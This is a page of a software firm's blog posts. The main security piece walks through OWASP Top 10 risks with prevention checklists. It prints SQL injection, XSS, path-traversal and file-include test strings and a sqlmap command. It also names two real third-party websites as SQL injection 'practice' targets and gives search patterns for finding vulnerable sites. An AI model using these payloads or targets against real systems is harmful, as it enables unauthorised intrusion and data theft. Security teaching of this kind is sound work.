Consumer Internet

Power of live chat: Boost your conversion by 3.5X

Many online consumers want help from a live person while they are shopping online; in fact, 44% of online consumers say that having questions answered by a live person while in the middle of an online purchase is one of the most important features a Website can offer.

Increase the online sales by 3.5 times with chat solution:

At Mantra we have seen the online chat interfaces increase the online sales of the platform by more than 3.5 times after the Chat service was introduced. We believe that live chat can add real value to your business with its wide range of benefits and functionalities.

One of India’s health insurance company approached us to improve their customer experience. Based on our learning through developing AI Chatbot solutions for enterprise customers, we have developed a Hybrid AI-Enabled Chat Solution which combines the best of traditional and AI chat solution options.

 Our Hybrid AI-Enabled Chat Solution

The core idea is to quickly deploy an Enterprise grade Chat solution for the client (over Mobile, Web or Facebook) with the ability for human agents to carry out meaningful conversations with customers. This conversational data will be input for training a Bot which will over time learn and then start assisting human agents in drafting meaningful responses.  Eventually, when the bot is trained enough, it will be able to take over from Agents with an manual over-ride function always available.

The core USPs of the solution are

a. Quicker Deployment.

b. More meaningful Data for bots to train on.

c. Significant savings in the long-term with agents being replaced.

A Chat interface should be one of your high priority items for website improvement. We can surely help you with that and you don’t need to take our word for that we have already proven results to back it up.

 

Latest PHP Trends in 2018

 

PHP is one of the most simple to use the server-side scripting language. PHP frameworks are developed to complement PHP in many ways as they cater a basic structure and enforce the developers to use coding standards and development guidelines to stabilize the product and standardize the process. So this helps to reduce complexity & facilitates developers with all the comfort to focus on their specific areas without affecting the development of other modules.

I have listed down some of the main PHP frameworks which will remain the popular choice for developers in 2018 as well.

Laravel

According to our recent analysis of Google Trends, it can be clearly noticed that Laravel framework stands out & stands above all the frameworks listed and shall stay at the top in 2018. Since 2015’s Sitepoint survey showed that Laravel framework has an excellent documentation, robust features and a growing support community which made Laravel a clear winner in the list of PHP frameworks. Till now with the launch of Laravel 5.5 framework Google Trends has witnessed an increase in Laravel search results across the globe.

Laravel Framework facilitates many specific packages such the Blade Templating Engine, Artisan, eloquent ORM, Middleware, PHPUnit for Unit Testing, RESTful controllers & being the first one to introduce routing in an abstract way. All because of these extensive features many companies started providing Laravel Development Services to grow their business.

One of the most important functionalities of Laravel is the way it handles NoSQL structures like MongoDB & more. It is easy & comfortable for any developer to get started with Laravel because of its excellent documentation. If you are a developer who wishes to work with PHP then it is very useful to become a PHP Laravel developer.

CodeIgniter

This framework, which has more than 11 years, shot to fame thanks to the relatively unassuming use of resources, simplicity, convenience, a huge number of documents, designed for developers of any level, the absence of restrictions. At one time, Laravel is beginning to develop as a competitor CodeIgniter, so that until recently it was a universal benchmark.

  • CodeIgniter Reactor great support community, including libraries, modules, templates, and documentation;
  • Templates to work with databases, which are very similar to SQL syntax
  • The possibility of caching on the server side;
  • Using the package manager for quick connection of the libraries from the command line.

Symfony

Symfony has been touted for a while now as a very stable, high performance, well documented, and modular project. Symfony is backed by the French SensioLabs and has been developed by them and its community to be a fantastic framework.

  • Symfony defines MVC while many other frameworks try to simply follow MVC rules.
  • The standards of Symfony also make it easier to catch errors and to write high-quality code; its community is growing every year.
  • Symfony is The leading PHP framework to create websites and web applications
  • Laravel uses Symfony

Symfony is used by many big name companies like the BBC and open source project such as Drupal and eZpublish. Symfony was written with stability in mind in a very professional way. Its documentation is extensive, and its community is just as vast. Hence used for building both performances REST APIs, as well as fully fledged web applications.

Yii 

Yii is considered as the best framework in a lot of PHP frameworks. This framework facilitates the development of any kind of web app. It is known for being fast & flexible. Yii 2 is easy to install as it utilizes modern technologies & is backed up by the extensive set of features. Moreover, it supports high extensibility with great security & encourages testing. The launch of Yii 2.0 beta has started attracting developers with its new functionalities, features, changes, bug fixes & more. Yii 2 supports PHP 5.3 and some of the functionalities have been inherited from Yii 1.1

CakePHP

Being one of the oldest frameworks CakePHP retains its user base & is gradually but continuously growing. It also has an impressive portfolio comprising of big brands such as Express & BMW. Alike CodeIgnitor, CakePHP is an ideal framework for beginners. It also supports the rapid development of commercial web apps. It has built-in code generation with a scaffolding functionality to increase the speed of development & numerous packages to carry out general functionalities. Configuration process of CakePHP is a breeze as it reduces the need for unwanted complicated files such as XML or YAML config files. Faster builds are one of the main features along with the security features which include measures to prevent cyber-attacks.

ZEND

Zend Framework is prominently known for its go-to professional framework. It is commonly used for powerful enterprise-level applications. It is built with an extensive set of features such as security, extensibility in mind & performance. Zend isn’t ideal for rapid application development as it was developed with a focus on enterprise applications hence it has an enterprise driven nature with the support of numerous components such as feeds, forms, services and more.

Here is the link to know what were the trends in 2017, Latest PHP trends in 2017

 

Web Application Security Testing – Part 1

eb33b40e2bf41c3e815d4401ee514792ea7fe4dc1eb21845_1920

The Open Web Application Security Project (OWASP) is an international organization dedicated to enhancing the security of web applications.

The conference held at Mantra Labs by one of our experienced test engineer Rijin. Here he has  discussed the current top 10 web application security risks worldwide. The list describes each vulnerability, provides examples, and offers suggestions on how to avoid it.

The top 10 web application security risks worldwide are:

  1. Injection
  2. Broken authentication and session management
  3. Cross-site scripting
  4. Indirect object security reference
  5. Security misconfiguration
  6. Sensitive data exposure
  7. Missing function level access control
  8. Cross site forgery
  9. Using components with known vulnerabilities: Heartbleed and Shellshock
  10. Unvalidated redirects and forwards

Link to Hackerone Bug reports:

https://h1.sintheticlabs.com/

From here you can take the understanding and would get an idea of ongoing security issues/bugs. How the hackers are exploiting the web applications. Various security/penetration bugs are listed here.

https://www.exploit-db.com/exploits/42309/

 

  1. INJECTION

This is when an attacker sends rogue content to a web application interpreter causing the interpreter to execute authorized commands. The most common of the code injection attacks are SQL Injections, also known as SQLi. An SQLi attack is done when malformed code is sent to the database server, thus leading to the exposure of your data. And this attack style is so simple and easy, anyone with access to the internet can do it – SQLi scripts are available for download and can be acquired easily.

How is it done?

The character “‘” is entered into the search field and pressing the button leads to an error page which displays more information than needed.

This example showcases a badly and insecurely programmed application that is incapable of handling SQL Injections. Just a few illegal characters with a little sniffing around leads the hacker to this string: “‘ union select password from users;”. He can then implement this finding to harvest usernames and passwords from the database. This is just one basic way to exploit application databases.

Tool commonly used for SQL Injection

SQLmap

sqlmap is an open source penetration testing tool that automates the process of detecting and exploiting SQL injection flaws and taking over of database servers.

It is commonly used in Kali-linux.

After finding a vulnerable page you can find database by typing :

sqlmap –u (url) –dbs

Guide to exploit via sqlmap

https://www.darkmoreops.com/2014/08/28/use-sqlmap-sql-injection-hack-website-database/

https://www.hackers-arise.com/single-post/2017/01/20/Database-Hacking-Part-3-Using-sqlmap-for-SQL-Injection-Against-MySQL-and-WordPress

For practice you can use the following websites:

http://www.shumka.com/shumka-at-50/news/index.php?id=847

http://waytogonatural.com/product_detail.php?ID=4526

You can also find SQL vulnerable website on your own. You just have to look for

  • php?id=(any Number)
  • login.php?id=(any number)
  • index.php?id=(any number)

Examples of SQL injection:

https://hackerone.com/reports/200818

https://hackerone.com/reports/179751

2.BROKEN AUTHENTICATION AND SESSION MANAGEMENT

Incorrect implementation of authentication schemes and session management can allow unauthorized users to assume the identities of valid users.

Broken Authentication and Session Management attacks are anonymous attacks with the intention to try and retrieve passwords, user account information, IDs and other details.

Key Points to check if you are vulnerable:

  1. User authentication credentials aren’t protected when stored using hashing or encryption.
  2. Credentials can be guessed or overwritten through weak account management functions (e.g., account creation, change password, recover password, weak session IDs).
  3. Session IDs are exposed in the URL (e.g., URL rewriting).
  4. Session IDs are vulnerable to session fixation attacks.
  5. Session IDs don’t timeout, or user sessions or authentication tokens, particularly single sign-on (SSO) tokens, aren’t properly invalidated during logout.
  6. Session IDs aren’t rotated after successful login.
  7. Passwords, session IDs, and other credentials are sent over unencrypted connections.

Examples of attack scenarios:

Scenario #1:

Airline reservations application supports URL rewriting, putting session IDs in the URL:

http://example.com/sale/saleitems?sessionid=268544541&dest=Hawaii

An authenticated user of the site wants to let his friends know about the sale. He e-mails the above link without knowing he is also giving away his session ID. When his friends use the link they will use his session and credit card.

Scenario #2:

Application’s timeouts aren’t set properly. User uses a public computer to access site. Instead of selecting “logout” the user simply closes the browser tab and walks away. Attacker uses the same browser an hour later, and that browser is still authenticated.

Scenario #3:

Insider or external attacker gains access to the system’s password database. User passwords are not properly hashed, exposing every user’s’ password to the attacker.

Vulnerability to ‘Sensitive Data exposure’:

 

  1. Is any of this data stored in clear text long term, including backups of this data?
  2. Is any of this data transmitted in clear text, internally or externally? Internet traffic is especially dangerous.
  3. Are any old / weak cryptographic algorithms used?
  4. Are weak crypto keys generated, or is proper key management or rotation missing?
  5. Are any browser security directives or headers missing when sensitive data is provided by / sent to the browser? (Nikto)

Prevention from Sensitive data exposure:

  1. Make sure you encrypt all sensitive data .
  2. Don’t store sensitive data unnecessarily. Discard it as soon as possible. Data you don’t have can’t be stolen.
  3. Ensure strong standard algorithms and strong keys are used, and proper key management is in place.
  4. Ensure passwords are stored with an algorithm specifically designed for password protection, such as bcrypt, PBKDF2, or scrypt.
  5. Disable autocomplete on forms collecting sensitive data and disable caching for pages that contain sensitive data.

Protection against broken authentication and session management:

Password Strength

-Minimum size and complexity.

-Complexity depends on the usage of combinations of alphabetic, numeric, and/or non-                              alphanumeric characters

-Change password periodically

-Prevent from reusing previous passwords.

Password Use 

-Restrict to a defined number of login attempts per unit of time and repeated failed login                           attempts should be logged.

-System should not indicate whether it was the username or password that was wrong if a                           login  attempt fails.

Password Change Controls 

-Users should always be required to provide both their old and new password when changing                   their password .

-If forgotten passwords are emailed to users, the system should require the user to                                      reauthenticate whenever the user is changing their e-mail address, otherwise an attacker who                  temporarily has access to their session (e.g., by walking up to their computer while they are                       logged in) can simply change their e-mail address and request a ‘forgotten’ password be                           mailed to them.

Password Storage 

-Passwords must be stored in either hashed or encrypted form

-Encryption should be used when the plain text password is needed

Session ID Protection

-A user’s entire session should be protected via SSL.

-Session ID should never be included in the URL as they can be cached by the browser.

-Session IDs should be long, complicated, random numbers that cannot be easily guessed.

-Session IDs can also be changed frequently during a session to reduce how long a session ID                   is valid. Session IDs must be changed when switching to SSL, authenticating, or other major                   transitions.

Browser Caching 

-Authentication and session data should never be submitted as part of a GET, POST should                      always be used instead.

-Authentication pages should be marked with all varieties of the no cache tag to prevent                            someone from using the back button in a user’s browser to backup to the login page and                            resubmit the previously typed in credentials.

Examples of broken authentication and session management:

3.CROSS SITE SCRIPTING

This is when a browser unknowingly executes scripts to hijack sessions or redirect to a rogue site.

Cross-site Scripting (XSS) refers to client-side code injection attack wherein an attacker can execute malicious scripts (also commonly referred to as a malicious payload) into a legitimate website or web application. XSS is amongst the most rampant of web application vulnerabilities and occurs when a web application makes use of unvalidated or unencoded user input within the output it generates.

By leveraging XSS, an attacker does not target a victim directly. Instead, an attacker would exploit a vulnerability within a website or web application that the victim would visit, essentially using the vulnerable website as a vehicle to deliver a malicious script to the victim’s browser.

There are basically two types of XSS:

a)Stored XSS

b)Reflected XSS

Stored XSS

  • A Stored Cross Site Scripting vulnerability occurs when the malicious user can store some attack which will be called at a later time upon some other unknowing user. The attack is actually stored in some method to be later executed.
  • The storage of a method could involve a database, or a wiki, or blog. Basically the malicious user has stored some type of attack, that when an unknowing user will encounter this, the attack will be executed. The stored method actually not only has the problem of incorrect checking for input validation, but also for output validation. Even if data has been sanitized upon input, it should also be checked for in the output process. By checking and validated the output, you could also uncover unknown issues during the input validation process.

Reflected XSS

  • The malicious user has discovered that a field within a website or web application holds a XSS vulnerability. This malicious user then crafts a way to use the vulnerability to execute something malicious to some unknown user. Reflected XSS vulnerabilities occur when a unknowing user is directed to a web application that has a XSS vulnerability, by the malicious user. Once the unknowing user gets to the web site or application the malicious user’s attack is executed.
  • The attack is crafted by a series of url parameters that are sent via a url. The malicious user then sends his/her malicious url with the url parameters to unknowing users. This is typically sent by email, instant messages, blogs or forums, or any other possible methods.

How to test for XSS injection vulnerabilities, example:

You can determine if a web-based application is vulnerable to XSS attacks very easily. A simple easy test is to take a current parameter that is sent in the HTTP GET request and modify it. Take for example the following request in the browser address URL bar. This url will take a name parameter that you enter in a textbox and print something on the page. Like “Hello George, thank you for coming to my site” http://www.yoursite.com/index.html?name=george And modify it so that add an extra some additional information to the parameter. For example try entering something similar to the following request in the browser address URL bar.

http://www.yoursite.com/index.html?name=<script>alert(‘You just found a XSS vulnerability’)</script>

If this pops up an alert message box stating “You just found a XSS vulnerability”, then you know this parameter is vulnerable to XSS attacks. The parameter name is not being validating, it is allowing anything to be processed as a name, including a malicious script that is injected into the parameter passed in. Basically what is occurring is normally where the name George would be entered on the page the </script></script> message is instead being written to the dynamic page.

The alert message just is an example of how to test for the XSS vulnerability.

Some examples of cross-site scripting attack vectors:

http://hackersonlineclub.com/cross-site-scripting-xss/

Tools that can be used:

Zaproxy: It’s a freeware.

https://github.com/zaproxy/zaproxy/wiki/Downloads

Also Burp Suite and Beef can be used to find out XSS vulnerability.

4.INDIRECT OBJECT SECURITY REFERENCE

An attacker can access a reference to a file or directory and manipulate that reference to gain unauthorized access to other objects.

A direct object reference occurs when a developer exposes a reference to an internal implementation object, such as a file, directory, database record, or key, as a URL or form parameter. An attacker can manipulate direct object references to access other objects without authorization, unless an access control check is in place.

  • Vulnerability to Insecure Direct Object References
  1. For direct references to restricted resources, does the application fail to verify the user is authorized to access the exact resource they have requested?
  2. If the reference is an indirect reference, does the mapping to the direct reference fail to limit the values to those authorized for the current user?
  • To test Insecure Direct Object References

To test for this vulnerability the tester first needs to map out all locations in the application where user input is used to reference objects directly. For example, locations where user input is used to access a database row, a file, application pages and more. Next the tester should modify the value of the parameter used to reference objects and assess whether it is possible to retrieve objects belonging to other users or otherwise bypass authorization.

The best way to test for direct object references would be by having at least two (often more) users to cover different owned objects and functions. For example two users each having access to different objects (such as purchase information, private messages, etc.), and (if relevant) users with different privileges (for example administrator users) to see whether there are direct references to application functionality. By having multiple users the tester saves valuable testing time in guessing different object names as he can attempt to access objects that belong to the other user.

Some basic examples:

The value of a parameter is used directly to retrieve a database record

Sample request:

http://foo.bar/somepage?invoice=12345

  • In this case, the value of the invoice parameter is used as an index in an invoices table in the database. The application takes the value of this parameter and uses it in a query to the database. The application then returns the invoice information to the user.
  • Since the value of invoice goes directly into the query, by modifying the value of the parameter it is possible to retrieve any invoice object, regardless of the user to whom the invoice belongs. To test for this case the tester should obtain the identifier of an invoice belonging to a different test user (ensuring he is not supposed to view this information per application business logic), and then check whether it is possible to access objects without authorization.

Examples of the attack:

https://hackerone.com/reports/12011

https://hackerone.com/reports/42587

Testing traversal/file include

Many web applications use and manage files as part of their daily operation. Using input validation methods that have not been well designed or deployed, an aggressor could exploit the system in order to read or write files that are not intended to be accessible.

Testing techniques to test this flaw

In order to determine which part of the application is vulnerable to input validation bypassing, the tester needs to enumerate all parts of the application that accept content from the user. Here are some examples of the checks to be performed at this stage:

Are there request parameters which could be used for file-related operations?

Are there unusual file extensions?

Are there interesting variable names?

http://example.com/getUserProfile.jsp?item=ikki.html

http://example.com/index.php?file=content

http://example.com/main.cgi?home=index.htm

An attacker could insert the malicious string “../../../../etc/passwd” to include the password hash file of a Linux/UNIX system. This kind of attack is possible only if the validation checkpoint fails; according to the file system privileges, the web application itself must be able to read the file.

http://example.com/getUserProfile.jsp?item=../../../../etc/passwd

It also possible to include files and scripts located on external website.

http://example.com/index.php?file=http://www.owasp.org/malicioustxt

If protocols are accepted as arguments, as in the above example, it’s also possible to probe the local filesystem this way.

http://example.com/index.php?file=file:///etc/passwd

If protocols are accepted as arguments, as in the above examples, it’s also possible to probe the local services and nearby services.

http://example.com/index.php?file=http://localhost:8080 or http://example.com/index.php?file=http://192.168.0.2:9080

Example of path traversal: https://hackerone.com/reports/150018

5.SECURITY MISCONFIGURATION

Improper server or web application configuration leading to various flaws.

  • Debugging enabled
  • Incorrect folder permissions
  • Using default accounts or passwords

Vulnerability to Security Misconfiguration

Is your application missing the proper security hardening across any part of the application stack? Including:

  1. Is any of your software out of date? This software includes the OS, Web/App Server, DBMS, applications, APIs, and all components and libraries.
  2. Are any unnecessary features enabled or installed (e.g., ports, services, pages, accounts, privileges)?
  3. Are default accounts and their passwords still enabled and unchanged?
  4. Does your error handling reveal stack traces or other overly informative error messages to users?
  5. Are the security settings in your application servers, application frameworks (e.g., Struts, Spring, ASP.NET), libraries, databases, etc. not set to secure values?

Attack scenarios:

Scenario #1: The app server admin console is automatically installed and not removed. Default accounts aren’t changed. Attacker discovers the standard admin pages are on your server, logs in with default passwords, and takes over.

Scenario #2: Directory listing is not disabled on your web server. An attacker discovers they can simply list directories to find any file. The attacker finds and downloads all your compiled Java classes, which they decompile and reverse engineer to get all your custom code. Attacker then finds a serious access control flaw in your application.

Scenario #3: App server configuration allows stack traces to be returned to users, potentially exposing underlying flaws such as framework versions that are known to be vulnerable.

Scenario #4: App server comes with sample applications that are not removed from your production server. These sample applications have well known security flaws attackers can use to compromise your server.

Protection against Security misconfigurations:

  • Install latest updates and security patches. Have an easy to manage updating process with test environments to check updates before deploying to production environments.
  • Remove sample applications that ship with content delivery systems and web frameworks. Most tools that help build web applications include demo and sample code to help teach developers how to use the tools and get you started. These samples and demos should be removed. They provide a known target for anyone attempting to compromise web application security.
  • Remove unused features, plugins and web pages. Only include the parts of web applications that you need to provide your service to end users. Remove any plugins or functionality that you are not using.
  • Turn off access to setup and configuration pages. Don’t leave the setup and configuration pages available for users to use.
  • Change usernames, passwords and ports for default accounts. Web application frameworks and libraries often ship with default administration names, passwords and access ports enabled. Everyone knows these. Change all these to non standard usernames, passwords and ports.
  • Don’t share passwords between accounts on Dev, Test and Production systems. Related to the point above. Don’t use the same administration accounts and settings across your Dev, Test and Production systems.
  • Turn off debugging so that internal info isn’t sent back in response to test queries or errors. Excessive debugging information can be used to glean information about a web applications configuration.

Good read :

https://lockmedown.com/owasp-5-security-misconfiguration-hardening-your-asp-net-app/

Stay tuned for rest of the security risks, they are coming shortly.

“User Tracking Code” for Secure Lead Attribution

There are various insurance aggregators in the industry which frequently compare various insurance plans.

Often, a user might check out the details of a policy from the aggregator, but might not buy it from there.

There is a good chance that he goes to the actual insurance site and buys the policy from there. Read More….

Laravel vs Zend – Features You Need to Know Before You Start

Developing Web applications can be a time intensive and complicated process as it involves delivering unique user experiences over browsers and smartphones. However, it can be streamlined by using PHP framework to create simple and rapid agile applications. This is usually doable due to the reuse of generic modules or components, and the convenience that comes with a unified structural foundation. Read More….

7 Important Points To Consider Before Developing A Mobile App

Android-Apps-1(1)

Are you developing an application? Don’t you know what must be considered before starting?

Let’s start with an example – You have an idea to develop an application but you don’t know whether it actually will get good response from users or not. The first step is that your idea should be unique that has never been implemented previously.

Even if you develop an app that has never been developed, what is the guarantee that users will download and use? Even if they download what are the possibilities of using your app in a right way? Read More….

Google’s Material Design for Android- Trends You Must Follow in 2016

Material Design is a Latest design language developed by Google. Material Design makes more liberal use of grid-based layouts, responsive animations and transitions, padding, and depth effects such as lighting and shadow.

Material Design is a Google’s conceptual design philosophy that outlines how apps should look and work on mobile devices. It breaks down everything — such as animation, style, layout- and gives guidance on patterns, components and usability.  According to Google: “We challenged ourselves to create a visual language for our users that synthesizes the classic principles of good design with the innovation and possibility of technology and science. This is material design.” Read More….

10 Basic Principles of Interaction Design You Need to Know.

The definition for Interaction Design is, “it is the behaviour and structure of the interactive systems”. In other words, it is the relationship between the user and the product, and the service they use.

The interaction design should create great user experience. It requires experience and understanding of basic principles of the interaction design in most of the UI disciplines. It’s about designing for the entire interconnected system: the device, the interface, the context, the environment, and the people. Interaction designers strive to create meaningful relationships between people and the products and services that they use, from computers, to mobile devices, to appliances, and beyond.

Interaction Design principles are important to keep in mind as we develop complex applications. There are some key elements of an interaction design that cannot be neglected while creating an interface for the user.

Ten basic principles of interaction design that are needed to be considered are given below: Read More….

Java Vs Node.JS for Backend APIs – Developer’s Comparison

Java is considered as the best application development language. It is an object-oriented programming language which is used to create efficient quality applications for both computers and mobile phones. Java dominates Android phones, enterprise computing, and some embedded worlds like Blu-ray disks. While on the other hand Node.JS is a programming platform that allows you to write JavaScript on both the client side and the server side, mostly server-side code that is identical in syntax to browser JavaScript. It opens up new perspectives, still having its “browser” nature. The developers use both the languages to develop applications depending on the preference and the need of application. Read More….

10 Reasons To Get Started With Swift Programming Language

Swift is a powerful and intuitive programming language built on the best of C and Objective-C for iOS, OS X, tvOS, and watchOS. It proves to be effective as it is able to eliminate the constraints of C compatibility. Writing Swift code is interactive and fun, the syntax is concise yet expressive, and apps run lightning-fast. Swift possesses safer patterns for programming and it adds modern features to make programming easier, more flexible, and more fun.

Swift has the potential to become the de-facto programming language for creating immersive, responsive, consumer-facing applications for years to come. With optimized compiler for performance and the language for development, it generates faster code across the board, both for release and debug builds. The Swift compiler is also faster, even while adding new Fix-it suggestions such as where you can use let instead of var. Comments can include Markdown syntax to add rich text and embedded images that display in Xcode’s Quick Help. A new assistant shows your Swift API in a “header-like” view. And new syntax features combined with improvements to the Cocoa frameworks and Objective-C will make your code more expressive, and even safer.

Swift programming language has not only received widespread acceptance but has also become one of software developers’ favorite tools. Here are 10 reasons to get started to work with Swift now: Read More….